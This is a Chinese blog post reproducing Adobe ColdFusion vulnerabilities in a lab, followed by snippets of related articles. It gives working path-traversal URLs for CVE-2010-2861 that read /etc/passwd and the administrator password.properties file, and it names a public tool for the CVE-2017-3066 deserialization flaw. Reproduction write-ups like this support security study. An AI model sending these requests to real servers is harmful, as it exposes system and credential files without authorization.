Adobe ColdFusion

最新推荐文章于 2024-08-11 20:53:12 发布
最新推荐文章于 2024-08-11 20:53:12 发布
阅读量1.8k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiwangyizhicunzai/article/details/83834634
版权

Adobe ColdFusion

简介:

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
默认端口8500

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
读取文件内容

直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd:
在这里插入图片描述
读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en:
在这里插入图片描述

Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

这里直接使用现有的工具进行利用:

git clone https://github.com/codewhitesec/ColdFusionPwn.git

在这里插入图片描述

试了很多遍没成功显示版本号不支持?可能是环境出了点问题?等解决了再补上吧。

Adobe ColdFusion 反序列化漏洞复现(CVE-2023-29300)
0xSec
08-02 3065
Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2023-26361)
0xSec
01-28 1053
Adobe ColdFusion平台 filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Adobe ColdFusion反序列化漏洞(cve-2017-3066)
山兔的博客
08-03 682
Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
漏洞分析|Adobe ColdFusion 序列化漏洞(CVE-2023-29300)
m0_46699477的博客
08-02 2568
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程中也踩了不少坑。阅读本篇文章后,大家在复现此漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
漏洞复现-Adobe ColdFusion 反序列化漏洞(CVE-2023-29300)
最新发布
玄道的网安博客
08-11 1724
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如标签中的元素与属性将由StringHandler处理,标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2024-20767)
0xSec
03-31 1249
由于 Adobe ColdFusion 的访问控制不当,未经身份认证的远程攻击者可以构造恶意请求读取目标服务器上的任意文件,泄露敏感信息。
ColdFusion_Study.rar_ColdFusion stu_adobe coldfusion_coldfusion_
07-14
ColdFusion既是WEB服务器,也是一种WEB脚本语言,基于JAVA,非常...起源很早,大概1994年,原为一小公司产品,后为MacroMedia收购,现在Adobe。国内应用不多,国外好多企业都用的Coldfusion。如赛门铁克、ESRI等等。
【漏洞复现】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767
失心少年
04-23 920
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该平台ColdFusion 2023
ColdFusion后台利用方法
01-31
ColdFusion后台利用方法
docker-commandbox:适用于ColdFusionCFMLJava应用程序的官方CommandBox Docker映像
05-18
官方CommandBox Dockerfiles 这是Commandbox映像的官方Dockerfiles的存储库 这个怎么运作 此存储库中的Docker文件可用于创建您自己的自定义Docker容器,以在CommandBox上运行ColdFusion CFML应用程序。 利用CommandBox,您可以从项目根目录中的单个server.json文件配置整个ColdFusion CFML引擎环境。 标签 :latest ( )-最新的稳定版本 :commandbox-5.2.1带有用于构建映像的CommandBox版本标记的稳定映像 :3.2.0图片的标记版本 :snapshot开发/ BE版本 :[tag]-snapshot版本的开发/ BE版本(例如- :adobe2016-snapshot ) :jdk8使用OpenJDK8的基本映像 :alpine ( )-镜像的版本-整体大
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
时光凉春衫薄的博客
12-06 318
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 产品样子: 漏洞复现 登录界面?后边locale=../../../../../../../../../../etc/passwd%00en即可 读取后台用户密码 locale=../../..
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
weixin_46239998的博客
01-01 802
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。管理员密码获取到了,就可以正常玩耍了!三、输入admin初始化环境。五、漏洞利用,读取管理员密码。
Adobe ColdFusion文件读取突破(CVE-2010-2861)
willow_liang的博客
04-15 287
Adobe ColdFusion文件读取漏洞(CVE-2010-2861) 漏洞复现: Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 访问该目录 /CFIDE/administrator/enter.cfm?locale=../../../../../../../..
Adobe_ColdFusion文件读取漏洞 CVE-2010-2861 漏洞复现
ADummy的博客
02-22 1028
Adobe ColdFusion文件读取漏洞(CVE-2010-2861) by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ AdobeColdFusion是一款高效的网络应用服务器开发环境。AdobeColdFusion9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/admin
coldfusion下载地址
weixin_34044273的博客
07-29 191
     找了半天才找到coldfusion的下载地址,不容易,需要填写一堆垃圾信息。   http://trials.adobe.com/Applications/ColdFusion/801WWE/coldfusion-801-win.exe
ColdFusion是什么
Just be myself
08-18 1547
       Coldfusion是一个商业开发平台。          它既是一种应用服务器也是一种编程语言。很多开发人员常常把它们当成一件事,他们用ColdFusion语言(CFML - ColdFusion Markup Language)来编写应有程序,文件的扩展名是.cfm。并把编写的应用程序运行在ColdFusion服务器上(也可以部署在其它支持CFML的应用服务器上,如J2EE应...
详解 ColdFusion应用程序
lihe111的专栏
08-10 2425
SitePoint 上有许多教程可以帮助您领会使用 Flex 和 AIR 创建富 Internet 应用程序(Rich Internet Applications,RIA)的重要原则。您将发现,在 Flex 中进行的大多数开发都涉及到一个与 Flex 客户端交互的后端应用程序。我们来探讨一下 Flex 应用程序所含内容背后的一些理论和原则,然后通过一个 ColdFusion 应用程序将这些原则应用
Adobe ColdFusion 安装指南
"Adobe ColdFusion 安装指南" 本文档是Adobe ColdFusion的安装指南,适用于版本更新至2016年2月17日。ColdFusion是一种强大的Web应用开发平台,主要用于构建动态和交互式的网页应用程序。该指南详细介绍了安装过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值